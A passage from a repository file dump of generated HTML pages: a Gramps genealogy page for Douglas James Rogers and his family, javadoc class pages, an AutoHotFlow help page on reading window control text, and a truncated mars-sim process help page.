title="Individuals">Individuals</a></li> <li><a href="../../../index.html" title="Surnames">Surnames</a></li> <li><a href="../../../families.html" title="Families">Families</a></li> <li><a href="../../../events.html" title="Events">Events</a></li> <li><a href="../../../places.html" title="Places">Places</a></li> <li><a href="../../../sources.html" title="Sources">Sources</a></li> <li><a href="../../../repositories.html" title="Repositories">Repositories</a></li> <li><a href="../../../media.html" title="Media">Media</a></li> <li><a href="../../../thumbnails.html" title="Thumbnails">Thumbnails</a></li> </ul> </div> </div> <div class="content" id="IndividualDetail"> <h3>ROGERS, Douglas James<sup><small></small></sup></h3> <div id="summaryarea"> <table class="infolist"> <tr> <td class="ColumnAttribute">Birth Name</td> <td class="ColumnValue"> ROGERS, Douglas James <a href="#sref1a">1a</a> </td> </tr> <tr> <td class="ColumnAttribute">Gramps&nbsp;ID</td> <td class="ColumnValue">I10230</td> </tr> <tr> <td class="ColumnAttribute">Gender</td> <td class="ColumnValue">male</td> </tr> </table> </div> <div class="subsection" id="parents"> <h4>Parents</h4> <table class="infolist"> <thead> <tr> <th class="ColumnAttribute">Relation to main person</th> <th class="ColumnValue">Name</th> <th class="ColumnValue">Relation within this family (if not by birth)</th> </tr> </thead> <tbody> </tbody> <tr> <td class="ColumnAttribute">Father</td> <td class="ColumnValue"> <a href="../../../ppl/2/0/d15f603500d54baf8b60363f302.html">ROGERS, John Henry<span class="grampsid"> [I10224]</span></a> </td> </tr> <tr> <td class="ColumnAttribute">Mother</td> <td class="ColumnValue"> <a href="../../../ppl/9/9/d15f6034fd13f79487ee458cd99.html">STEPHENSON, Mary<span class="grampsid"> [I10223]</span></a> </td> </tr> <tr> <td class="ColumnAttribute">&nbsp;&nbsp;&nbsp;&nbsp;Sister</td> <td class="ColumnValue">&nbsp;&nbsp;&nbsp;&nbsp;<a href="../../../ppl/8/2/d15f603503841d0daefa28bec28.html">ROGERS, Alice Mary<span class="grampsid"> [I10225]</span></a></td> <td class="ColumnValue"></td> </tr> <tr> <td class="ColumnAttribute">&nbsp;&nbsp;&nbsp;&nbsp;Sister</td> <td class="ColumnValue">&nbsp;&nbsp;&nbsp;&nbsp;<a href="../../../ppl/5/9/d15f603504e5133f8ea2f362a95.html">ROGERS, Hazel Mary<span class="grampsid"> [I10226]</span></a></td> <td class="ColumnValue"></td> </tr> <tr> <td class="ColumnAttribute">&nbsp;&nbsp;&nbsp;&nbsp;Brother</td> <td class="ColumnValue">&nbsp;&nbsp;&nbsp;&nbsp;<a href="../../../ppl/f/a/d15f60350652a8f0416a8612caf.html">ROGERS, John Henry<span class="grampsid"> [I10227]</span></a></td> <td class="ColumnValue"></td> </tr> <tr> <td class="ColumnAttribute">&nbsp;&nbsp;&nbsp;&nbsp;Brother</td> <td class="ColumnValue">&nbsp;&nbsp;&nbsp;&nbsp;<a href="../../../ppl/3/9/d15f60350825fd7aecfba4f0b93.html">ROGERS, Alfred William<span class="grampsid"> [I10228]</span></a></td> <td class="ColumnValue"></td> </tr> <tr> <td class="ColumnAttribute">&nbsp;&nbsp;&nbsp;&nbsp;Sister</td> <td class="ColumnValue">&nbsp;&nbsp;&nbsp;&nbsp;<a href="../../../ppl/0/f/d15f60350a566eaffe0615040f0.html">ROGERS, Delis Irene<span class="grampsid"> [I10229]</span></a></td> <td class="ColumnValue"></td> </tr> <tr> <td class="ColumnAttribute">&nbsp;&nbsp;&nbsp;&nbsp;</td> <td class="ColumnValue">&nbsp;&nbsp;&nbsp;&nbsp;<a href="../../../ppl/6/9/d15f60350cf6e62fb5b46d1b496.html">ROGERS, Douglas James<span class="grampsid"> [I10230]</span></a></td> <td class="ColumnValue"></td> </tr> <tr> <td class="ColumnAttribute">&nbsp;&nbsp;&nbsp;&nbsp;Brother</td> <td class="ColumnValue">&nbsp;&nbsp;&nbsp;&nbsp;<a href="../../../ppl/7/a/d15f60350f6721306eba9f185a7.html">ROGERS, Arthur Ronald<span class="grampsid"> [I10231]</span></a></td> <td class="ColumnValue"></td> </tr> </table> </div> <div class="subsection" id="attributes"> <h4>Attributes</h4> <table class="infolist attrlist"> <thead> <tr> <th class="ColumnType">Type</th> <th class="ColumnValue">Value</th> <th class="ColumnNotes">Notes</th> <th class="ColumnSources">Sources</th> </tr> </thead> <tbody> <tr> <td class="ColumnType">_UID</td> <td class="ColumnValue">F85C057A335AB64D8055065D4DE03B292C2A</td> <td class="ColumnNotes"><div></div></td> <td class="ColumnSources">&nbsp;</td> </tr> </tbody> </table> </div> <div class="subsection" id="pedigree"> <h4>Pedigree</h4> <ol class="pedigreegen"> <li> <a href="../../../ppl/2/0/d15f603500d54baf8b60363f302.html">ROGERS, John Henry<span class="grampsid"> [I10224]</span></a> <ol> <li class="spouse"> <a href="../../../ppl/9/9/d15f6034fd13f79487ee458cd99.html">STEPHENSON, Mary<span class="grampsid"> [I10223]</span></a> <ol> <li> <a href="../../../ppl/8/2/d15f603503841d0daefa28bec28.html">ROGERS, Alice Mary<span class="grampsid"> [I10225]</span></a> </li> <li> <a href="../../../ppl/5/9/d15f603504e5133f8ea2f362a95.html">ROGERS, Hazel Mary<span class="grampsid"> [I10226]</span></a> </li> <li> <a href="../../../ppl/f/a/d15f60350652a8f0416a8612caf.html">ROGERS, John Henry<span class="grampsid"> [I10227]</span></a> </li> <li> <a href="../../../ppl/3/9/d15f60350825fd7aecfba4f0b93.html">ROGERS, Alfred William<span class="grampsid"> [I10228]</span></a> </li> <li> <a href="../../../ppl/0/f/d15f60350a566eaffe0615040f0.html">ROGERS, Delis Irene<span class="grampsid"> [I10229]</span></a> </li> <li class="thisperson"> ROGERS, Douglas James </li> <li> <a href="../../../ppl/7/a/d15f60350f6721306eba9f185a7.html">ROGERS, Arthur Ronald<span class="grampsid"> [I10231]</span></a> </li> </ol> </li> </ol> </li> </ol> </div> <div class="subsection" id="tree"> <h4>Ancestors</h4> <div id="treeContainer" style="width:735px; height:602px;"> <div class="boxbg male AncCol0" style="top: 269px; left: 6px;"> <a class="noThumb" href="../../../ppl/6/9/d15f60350cf6e62fb5b46d1b496.html"> ROGERS, Douglas James </a> </div> <div class="shadow" style="top: 274px; left: 10px;"></div> <div class="bvline" style="top: 301px; left: 165px; width: 15px"></div> <div class="gvline" style="top: 306px; left: 165px; width: 20px"></div> <div class="boxbg male AncCol1" style="top: 119px; left: 196px;"> <a class="noThumb" href="../../../ppl/2/0/d15f603500d54baf8b60363f302.html"> ROGERS, John Henry </a> </div> <div class="shadow" style="top: 124px; left: 200px;"></div> <div class="bvline" style="top: 151px; left: 180px; width: 15px;"></div> <div class="gvline" style="top: 156px; left: 185px; width: 20px;"></div> <div class="bhline" style="top: 151px; left: 180px; height: 150px;"></div> <div class="gvline" style="top: 156px; left: 185px; height: 150px;"></div> <div class="boxbg female AncCol1" style="top: 419px; left: 196px;"> <a class="noThumb" href="../../../ppl/9/9/d15f6034fd13f79487ee458cd99.html"> STEPHENSON, Mary </a> </div> <div class="shadow" style="top: 424px; left: 200px;"></div> <div class="bvline" style="top: 451px; left: 180px; width: 15px;"></div> <div class="gvline" style="top: 456px; left: 185px; width: 20px;"></div> <div class="bhline" style="top: 301px; left: 180px; height: 150px;"></div> <div class="gvline" style="top: 306px; left: 185px; height: 150px;"></div> <div class="bvline" style="top: 451px; left: 355px; width: 15px"></div> <div class="gvline" style="top: 456px; left: 355px; width: 20px"></div> <div class="boxbg male AncCol2" style="top: 344px; left: 386px;"> <a class="noThumb" href="../../../ppl/3/5/d15f60348e02fbebc395f30b553.html"> STEPHENSON, George </a> </div> <div class="shadow" style="top: 349px; left: 390px;"></div> <div class="bvline" style="top: 376px; left: 370px; width: 15px;"></div> <div class="gvline" style="top: 381px; left: 375px; width: 20px;"></div> <div class="bhline" style="top: 376px; left: 370px; height: 75px;"></div> <div class="gvline" style="top: 381px; left: 375px; height: 75px;"></div> <div class="boxbg female AncCol2" style="top: 494px; left: 386px;"> <a class="noThumb" href="../../../ppl/2/8/d15f603489e55b5364f80934f82.html"> HOVEY, Caroline Elizabeth </a> </div> <div class="shadow" style="top: 499px; left: 390px;"></div> <div class="bvline" style="top: 526px; left: 370px; width: 15px;"></div> <div class="gvline" style="top: 531px; left: 375px; width: 20px;"></div> <div class="bhline" style="top: 451px; left: 370px; height: 75px;"></div> <div class="gvline" style="top: 456px; left: 375px; height: 75px;"></div> <div class="bvline" style="top: 526px; left: 545px; width: 15px"></div> <div class="gvline" style="top: 531px; left: 545px; width: 20px"></div> <div class="boxbg male AncCol3" style="top: 457px; left: 576px;"> <a class="noThumb" href="../../../ppl/c/b/d15f603300b2458683c0b6fa2bc.html"> HOVEY, James </a> </div> <div class="shadow" style="top: 462px; left: 580px;"></div> <div class="bvline" style="top: 489px; left: 560px; width: 15px;"></div> <div class="gvline" style="top: 494px; left: 565px; width: 20px;"></div> <div class="bhline" style="top: 489px; left: 560px; height: 37px;"></div> <div class="gvline" style="top: 494px; left: 565px; height: 37px;"></div> <div class="boxbg female AncCol3" style="top: 531px; left: 576px;"> <a class="noThumb" href="../../../ppl/5/1/d15f6032fb83280de57e4de5d15.html"> LUCAS, Caroline </a> </div> <div class="shadow" style="top: 536px; left: 580px;"></div> <div class="bvline" style="top: 563px; left: 560px; width: 15px;"></div> <div class="gvline" style="top: 568px; left: 565px; width: 20px;"></div> <div class="bhline" style="top: 526px; left: 560px; height: 37px;"></div> <div class="gvline" style="top: 531px; left: 565px; height: 37px;"></div> </div> </div> <div class="subsection" id="sourcerefs"> <h4>Source References</h4> <ol> <li> <a href="../../../src/e/e/d15f5fe06de45269a4c5f8971ee.html" title="Frank Lee: GEDCOM File : JamesLUCAS.ged" name ="sref1"> Frank Lee: GEDCOM File : JamesLUCAS.ged <span class="grampsid"> [S0299]</span> </a> <ol> <li id="sref1a"> <ul> <li> Confidence: Low </li> </ul> </li> </ol> </li> </ol> </div> </div> <div class="fullclear"></div> <div id="footer"> <p id="createdate"> Generated by <a href="http://gramps-project.org/">Gramps</a> 4.2.8<br />Last change was the 2015-08-05 19:54:48<br />Created for <a href="../../../ppl/9/e/d15f5fb48902c4fc1b421d249e9.html">GAMMON, Francis</a> </p> <p id="copyright"> </p> </div> </body> </html>
doc/mk/tmdb/core/class-use/TMDbAuthentication.html
makgyver/MKtmdb
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="it"> <head> <!-- Generated by javadoc (version 1.7.0_12-ea) on Wed Jan 09 22:57:58 CET 2013 --> <title>Uses of Class mk.tmdb.core.TMDbAuthentication</title> <meta name="date" content="2013-01-09"> <link rel="stylesheet" type="text/css" href="../../../../stylesheet.css" title="Style"> </head> <body> <script type="text/javascript"><!-- if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Uses of Class mk.tmdb.core.TMDbAuthentication"; } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar_top"> <!-- --> </a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../overview-summary.html">Overview</a></li> <li><a href="../package-summary.html">Package</a></li> <li><a href="../../../../mk/tmdb/core/TMDbAuthentication.html" title="class in mk.tmdb.core">Class</a></li> <li class="navBarCell1Rev">Use</li> <li><a href="../package-tree.html">Tree</a></li> <li><a href="../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../index-files/index-1.html">Index</a></li> <li><a href="../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../../index.html?mk/tmdb/core/class-use/TMDbAuthentication.html" target="_top">Frames</a></li> <li><a href="TMDbAuthentication.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <div class="header"> <h2 title="Uses of Class mk.tmdb.core.TMDbAuthentication" class="title">Uses of Class<br>mk.tmdb.core.TMDbAuthentication</h2> </div> <div class="classUseContainer">No usage of mk.tmdb.core.TMDbAuthentication</div> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar_bottom"> <!-- --> </a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../overview-summary.html">Overview</a></li> <li><a href="../package-summary.html">Package</a></li> <li><a href="../../../../mk/tmdb/core/TMDbAuthentication.html" title="class in mk.tmdb.core">Class</a></li> <li class="navBarCell1Rev">Use</li> <li><a href="../package-tree.html">Tree</a></li> <li><a href="../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../index-files/index-1.html">Index</a></li> <li><a href="../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../../index.html?mk/tmdb/core/class-use/TMDbAuthentication.html" target="_top">Frames</a></li> <li><a href="TMDbAuthentication.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> </body> </html>
Source_Elements/Default/help/en/Actions/Get_control_text.html
bichlepa/AutoHotFlow
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=utf-8"> <link rel="stylesheet" href="../../stylesheet.css"> <link rel="stylesheet" href="stylesheet.css"> <link rel="stylesheet" href="../../../../../Help/stylesheet.css"> </HEAD> <BODY LANG="en-US" DIR="LTR"> <H1>Get control text</H1> <p> The action <B>Get control text</B> retrieves a text from a control. </p> <H2>Settings</H2> <table class="settings"> <TR> <TD> <h4>Output variable name</h4> <p>Name of the variable which will contain the retrieved control text.</p> </TD> </TR> <TR> <TD> <h4>Control identification</h4> <p>You can choose a <b>method for control identification</b>: <br/>If <b>Text in control</b> is selected, a control will be identified by its text, which must contain the entered string. <br/>If <b>Classname and instance number of the control</b> is selected, the control will be identified by its unique classname and instance number. Usually this identifier is always the same in every instance of the window. <br/>If <b>Unique control ID</b> is selected, the control will be identified by it unique ID. This ID is different in every instance of the window. So, if a window is closed and opened again, the ID of the same control is different. <br/>Choose whether the <b>control identification</b> start with, contain anywhere oder be exactly the specified value. </p> </TD> </TR> <TR> <TD> <h4>Window identification</h4> <p><b>Title of window</b>: Name of the window title. It can be chosen whether the title starts, contains or ends with the specified string. <br/><b>Exclude title</b>: Windows whose titles include this value will not be considered. <br/><b>Text of a control in window</b>: If present, this parameter must be a substring from a single text element of the target window. It can be specified whether hidden text will be found <br/><b>Exclude text of a control in window</b>: Windows whose text include this value will not be considered <br/><b>Window class</b>: A window class is a set of attributes that the system uses as a template to create a window. In other words, the class name of the window identifies what type of window it is. <br/><b>Process name</b>: The name or path of the executable that created that window. <br/><b>Unique window ID</b>: Each window or control has a unique ID, also known as a HWND (short for handle to window). This ID can be used to identify the window or control even if its title changes. <br/><b>Unique process ID</b>: Use the unique process id to identify a window belonging to a specific process. Each process has its unique ID, even if it has the same executable. <br/><b>Hidden window</b>: If detect hidden window is selected, a window that exists but is not visible will be found. <br/><b>Import window identification</b>: Use a wizard to get parameters of a window. </p> <p>At least <b>Title of window</b>, <b>Window class</b>, <b>Process name</b>, <b>Unique window ID</b> or <b>Unique process ID</b> must be set.</p> </TD> </TR> </table> <H2>Supplied Variables</H2> <table class="variables"> <TR> <TD> <h4 class="VariableName">A_WindowID</h4> <p>The unique ID of the found window.</p> </TD> </TR> <TR> <TD> <h4 class="VariableName">A_ControlID</h4> <p>The unique ID of the found control.</p> </TD> </TR> </table> </BODY> </HTML>
DeclareDesigner/doc/nl/tue/teamwork/appl/framework/Framework.html
ijlalhussain/LogGenerator
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.5.0_06) on Thu Jan 18 11:09:03 CET 2007 --> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <TITLE> Framework </TITLE> <META NAME="keywords" CONTENT="nl.tue.teamwork.appl.framework.Framework class"> <LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../../stylesheet.css" TITLE="Style"> <SCRIPT type="text/javascript"> function windowTitle() { parent.document.title="Framework"; } </SCRIPT> <NOSCRIPT> </NOSCRIPT> </HEAD> <BODY BGCOLOR="white" onload="windowTitle();"> <!-- ========= START OF TOP NAVBAR ======= --> <A NAME="navbar_top"><!-- --></A> <A HREF="#skip-navbar_top" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_top_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;PREV CLASS&nbsp; &nbsp;NEXT CLASS</FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../../index.html?nl/tue/teamwork/appl/framework/Framework.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="Framework.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> <TR> <TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2"> SUMMARY:&nbsp;NESTED&nbsp;|&nbsp;FIELD&nbsp;|&nbsp;<A HREF="#constructor_summary">CONSTR</A>&nbsp;|&nbsp;<A HREF="#method_summary">METHOD</A></FONT></TD> <TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2"> DETAIL:&nbsp;FIELD&nbsp;|&nbsp;<A HREF="#constructor_detail">CONSTR</A>&nbsp;|&nbsp;<A HREF="#method_detail">METHOD</A></FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_top"></A> <!-- ========= END OF TOP NAVBAR ========= --> <HR> <!-- ======== START OF CLASS DATA ======== --> <H2> <FONT SIZE="-1"> nl.tue.teamwork.appl.framework</FONT> <BR> Class Framework</H2> <PRE> java.lang.Object <IMG SRC="../../../../../resources/inherit.gif" ALT="extended by "><B>nl.tue.teamwork.appl.framework.Framework</B> </PRE> <HR> <DL> <DT><PRE>public class <B>Framework</B><DT>extends java.lang.Object</DL> </PRE> <P> <HR> <P> <!-- ======== CONSTRUCTOR SUMMARY ======== --> <A NAME="constructor_summary"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> <B>Constructor Summary</B></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><CODE><B><A HREF="../../../../../nl/tue/teamwork/appl/framework/Framework.html#Framework()">Framework</A></B>()</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> </TABLE> &nbsp; <!-- ========== METHOD SUMMARY =========== --> <A NAME="method_summary"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> <B>Method Summary</B></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>static&nbsp;void</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../../nl/tue/teamwork/appl/framework/Framework.html#main(java.lang.String[])">main</A></B>(java.lang.String[]&nbsp;args)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> </TABLE> &nbsp;<A NAME="methods_inherited_from_class_java.lang.Object"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#EEEEFF" CLASS="TableSubHeadingColor"> <TH ALIGN="left"><B>Methods inherited from class java.lang.Object</B></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><CODE>clone, equals, finalize, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait</CODE></TD> </TR> </TABLE> &nbsp; <P> <!-- ========= CONSTRUCTOR DETAIL ======== --> <A NAME="constructor_detail"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="1"><FONT SIZE="+2"> <B>Constructor Detail</B></FONT></TH> </TR> </TABLE> <A NAME="Framework()"><!-- --></A><H3> Framework</H3> <PRE> public <B>Framework</B>()</PRE> <DL> </DL> <!-- ============ METHOD DETAIL ========== --> <A NAME="method_detail"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="1"><FONT SIZE="+2"> <B>Method Detail</B></FONT></TH> </TR> </TABLE> <A NAME="main(java.lang.String[])"><!-- --></A><H3> main</H3> <PRE> public static void <B>main</B>(java.lang.String[]&nbsp;args)</PRE> <DL> <DD><DL> </DL> </DD> </DL> <!-- ========= END OF CLASS DATA ========= --> <HR> <!-- ======= START OF BOTTOM NAVBAR ====== --> <A NAME="navbar_bottom"><!-- --></A> <A HREF="#skip-navbar_bottom" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_bottom_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;PREV CLASS&nbsp; &nbsp;NEXT CLASS</FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../../index.html?nl/tue/teamwork/appl/framework/Framework.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="Framework.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> <TR> <TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2"> SUMMARY:&nbsp;NESTED&nbsp;|&nbsp;FIELD&nbsp;|&nbsp;<A HREF="#constructor_summary">CONSTR</A>&nbsp;|&nbsp;<A HREF="#method_summary">METHOD</A></FONT></TD> <TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2"> DETAIL:&nbsp;FIELD&nbsp;|&nbsp;<A HREF="#constructor_detail">CONSTR</A>&nbsp;|&nbsp;<A HREF="#method_detail">METHOD</A></FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_bottom"></A> <!-- ======== END OF BOTTOM NAVBAR ======= --> <HR> </BODY> </HTML>
mars-sim-ui/src/main/resources/docs/help/processes/process_manufacture_gas_tank.html
mars-sim/mars-sim
<!DOCTYPE html> <!-- Generated for mars-sim by st.pa. --> <html lang="en"> <head> <meta charset="UTF-8"> <title>Mars Simulation Project - Generated help file - Process "manufacture gas tank"</title> <link rel="stylesheet" href="../msp.css"> </head> <body> <TT> <h2>Process : "Manufacture Gas Tank"</h2> 1. Description : <p><ul><li></li></ul></p><br/>2. Characteristics : <table> <tr> <td>Required&nbsp;Building&nbsp;Tech&nbsp;Level&nbsp;&nbsp;&nbsp;</td> <td>2</td> </tr> <tr> <td>Required&nbsp;Skill&nbsp;Level</td> <td>1</td> </tr> <tr> <td>Work&nbsp;Time&nbsp;in&nbsp;millisols</td> <td>50.0</td> </tr> <tr> <td>Time&nbsp;in&nbsp;millisols</td> <td>200.0</td> </tr> <tr> <td>Power&nbsp;Requirement</td> <td>0.3</td> </tr> </table> <br/> 3. Process Inputs : <p><table><ul> <tr> <td><li></td> <td><a href="../parts/parts.html">Part</a></td> <td>&nbsp;&nbsp;&nbsp;</td> <td>2.0</td> <td>&nbsp;&nbsp;&nbsp;</td> <td><a href="../parts/part_steel_sheet.html">Steel&nbsp;Sheet</a></td> <td></li></td> </tr> <tr> <td><li></td> <td><a href="../parts/parts.html">Part</a></td> <td>&nbsp;&nbsp;&nbsp;</td> <td>1.0</td> <td>&nbsp;&nbsp;&nbsp;</td> <td><a href="../parts/part_valve.html">Valve</a></td> <td></li></td> </tr> <tr> <td><li></td> <td><a href="../parts/parts.html">Part</a></td> <td>&nbsp;&nbsp;&nbsp;</td> <td>1.0</td> <td>&nbsp;&nbsp;&nbsp;</td> <td><a href="../parts/part_gasket.html">Gasket</a></td> <td></li></td> </tr> <tr> <td><li></td> <td><a href="../parts/parts.html">Part</a></td> <td>&nbsp;&nbsp;&nbsp;</td> <td>1.0</td> <td>&nbsp;&nbsp;&nbsp;</td> <td><a href="../parts/part_plastic_tubing.html">Plastic&nbsp;Tubing</a></td> <td></li></td> </tr> <tr> <td><li></td> <td><a href="../parts/parts.html">Part</a></td> <td>&nbsp;&nbsp;&nbsp;</td> <td>1.0</td> <td>&nbsp;&nbsp;&nbsp;</td> <td><a 